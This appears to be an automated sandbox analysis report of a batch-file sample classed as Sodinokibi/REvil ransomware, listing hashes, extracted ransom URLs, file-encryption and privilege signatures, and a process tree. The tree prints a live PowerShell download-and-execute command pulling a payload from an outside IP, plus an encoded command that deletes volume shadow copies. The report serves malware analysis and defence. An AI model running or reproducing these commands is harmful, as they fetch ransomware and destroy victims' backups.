Analysis
max time kernel: 144s
max time network: 147s
platform: windows10_x64
resource: win10v200722
submitted: 09-08-2020 06:10

Static task: static1
Behavioral task: behavioral1
  Sample: 0cc92ed976f20bbf302be1a39d209cfb.bat
  Resource: win7
Behavioral task: behavioral2
  Sample: 0cc92ed976f20bbf302be1a39d209cfb.bat
  Resource: win10v200722
General
Target: 0cc92ed976f20bbf302be1a39d209cfb.bat
Size: 215B
MD5: 5a017babe92c5caf427346c46b48b015
SHA1: 2958eaeeb470d273b70d1528c0e78b33de585b8c
SHA256: 02a0406ce3e4a1076e67011128e0f0ea53e4c1ab7826a25e0215c8418960563e
SHA512: 8406dd4b30b5f549321ee69c640c3ddb93cdf3213075ddd8f283698129b39a1ae09e08cceea0a508aaa2a600b96f7e491331edd63e8f2309563bebc386ef6ece
Malware Config
Extracted: http://185.103.242.78/pastes/0cc92ed976f20bbf302be1a39d209cfb
Extracted: C:\jl77p-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/183B54E3404D5CCD
    http://decryptor.cc/183B54E3404D5CCD
Signatures

Modifies extensions of user files (10 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: powershell.exe
  File renamed: C:\Users\Admin\Pictures\EnterConvertFrom.tiff => \??\c:\users\admin\pictures\EnterConvertFrom.tiff.jl77p (powershell.exe)
  File renamed: C:\Users\Admin\Pictures\RevokeUse.png => \??\c:\users\admin\pictures\RevokeUse.png.jl77p (powershell.exe)
  File renamed: C:\Users\Admin\Pictures\SyncInstall.crw => \??\c:\users\admin\pictures\SyncInstall.crw.jl77p (powershell.exe)
  File renamed: C:\Users\Admin\Pictures\SyncRemove.png => \??\c:\users\admin\pictures\SyncRemove.png.jl77p (powershell.exe)
  File renamed: C:\Users\Admin\Pictures\SyncRestart.tif => \??\c:\users\admin\pictures\SyncRestart.tif.jl77p (powershell.exe)
  File opened for modification: \??\c:\users\admin\pictures\EnterConvertFrom.tiff (powershell.exe)
  File renamed: C:\Users\Admin\Pictures\JoinOut.raw => \??\c:\users\admin\pictures\JoinOut.raw.jl77p (powershell.exe)
  File renamed: C:\Users\Admin\Pictures\MountSkip.raw => \??\c:\users\admin\pictures\MountSkip.raw.jl77p (powershell.exe)
  File renamed: C:\Users\Admin\Pictures\RepairAssert.raw => \??\c:\users\admin\pictures\RepairAssert.raw.jl77p (powershell.exe)
  File renamed: C:\Users\Admin\Pictures\SaveEnter.png => \??\c:\users\admin\pictures\SaveEnter.png.jl77p (powershell.exe)
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  Token: SeDebugPrivilege (PID 796 powershell.exe)
  Token: SeDebugPrivilege (PID 796 powershell.exe)
  Token: SeDebugPrivilege (PID 1476 powershell.exe)
  Token: SeBackupPrivilege (PID 764 vssvc.exe)
  Token: SeRestorePrivilege (PID 764 vssvc.exe)
  Token: SeAuditPrivilege (PID 764 vssvc.exe)
  Token: SeTakeOwnershipPrivilege (PID 796 powershell.exe)
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes: powershell.exe, powershell.exe
  PID 796 powershell.exe (5 entries)
  PID 1476 powershell.exe (3 entries)
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rak8g7m1k13yk.bmp" (powershell.exe)
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
Suspicious use of WriteProcessMemory (6 IoCs)
Processes: cmd.exe, powershell.exe
  PID 496 (cmd.exe) wrote to memory of PID 796 (powershell.exe) (3 entries)
  PID 796 (powershell.exe) wrote to memory of PID 1476 (powershell.exe) (3 entries)
Blacklisted process makes network request (94 IoCs)
Processes: powershell.exe
  PID 796 powershell.exe, flows listed: 1, 12, 13, 15, 17, 19, 21, 23, 25, 27, 29, 31, 33, 35, 37, 39, 41, 43, 45, 46, 49, 51, 53, 55, 57, 59, 61, 63, 64, 67, 68, 70, 72, 74, 76, 78, 80, 82, 84, 86, 88, 90, 92, 94, 96, 98, 100, 102, 104, 107, 109, 111, 113, 115, 117, 119, 121, 123, 125, 127, 130, 132, 134, 136
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Drops file in Program Files directory (30 IoCs)
Processes: powershell.exe
  File opened for modification: \??\c:\program files\MergeCompress.wvx (powershell.exe)
  File opened for modification: \??\c:\program files\RestoreSet.AAC (powershell.exe)
  File opened for modification: \??\c:\program files\ResumeSwitch.crw (powershell.exe)
  File opened for modification: \??\c:\program files\ConvertFromConvert.vbs (powershell.exe)
  File opened for modification: \??\c:\program files\DismountConfirm.ps1xml (powershell.exe)
  File opened for modification: \??\c:\program files\AssertPing.3gpp (powershell.exe)
  File opened for modification: \??\c:\program files\ClearTest.mp4v (powershell.exe)
  File opened for modification: \??\c:\program files\CloseGroup.vsx (powershell.exe)
  File opened for modification: \??\c:\program files\DisconnectBackup.mpeg (powershell.exe)
  File opened for modification: \??\c:\program files\ResumeUpdate.snd (powershell.exe)
  File opened for modification: \??\c:\program files\StopPop.jpeg (powershell.exe)
  File created: \??\c:\program files (x86)\jl77p-readme.txt (powershell.exe)
  File opened for modification: \??\c:\program files\ConvertFromComplete.htm (powershell.exe)
  File opened for modification: \??\c:\program files\PopRequest.midi (powershell.exe)
  File opened for modification: \??\c:\program files\RevokeRestore.cfg (powershell.exe)
  File opened for modification: \??\c:\program files\WriteStep.mov (powershell.exe)
  File created: \??\c:\program files\jl77p-readme.txt (powershell.exe)
  File opened for modification: \??\c:\program files\MoveConvertFrom.mp2 (powershell.exe)
  File opened for modification: \??\c:\program files\ReadAssert.au3 (powershell.exe)
  File opened for modification: \??\c:\program files\LockWrite.ram (powershell.exe)
  File opened for modification: \??\c:\program files\NewImport.xlsb (powershell.exe)
  File opened for modification: \??\c:\program files\SendSearch.snd (powershell.exe)
  File opened for modification: \??\c:\program files\SetUninstall.ogg (powershell.exe)
  File opened for modification: \??\c:\program files\GrantApprove.ram (powershell.exe)
  File opened for modification: \??\c:\program files\RestoreGroup.html (powershell.exe)
  File opened for modification: \??\c:\program files\ShowMount.ppsx (powershell.exe)
  File opened for modification: \??\c:\program files\OpenMerge.docx (powershell.exe)
  File opened for modification: \??\c:\program files\RenameRedo.au (powershell.exe)
  File opened for modification: \??\c:\program files\SplitDeny.mov (powershell.exe)
  File opened for modification: \??\c:\program files\UndoRepair.kix (powershell.exe)
Processes

C:\Windows\system32\cmd.exe (PID 496)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0cc92ed976f20bbf302be1a39d209cfb.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 796)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0cc92ed976f20bbf302be1a39d209cfb');Invoke-JNLSXVWQ;Start-Sleep -s 10000"
    - Modifies extensions of user files
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    - Blacklisted process makes network request
    - Drops file in Program Files directory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1476)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}", i.e. deletion of volume shadow copies, which is why vssvc.exe starts and takes backup/restore privileges below)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe (PID 764)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service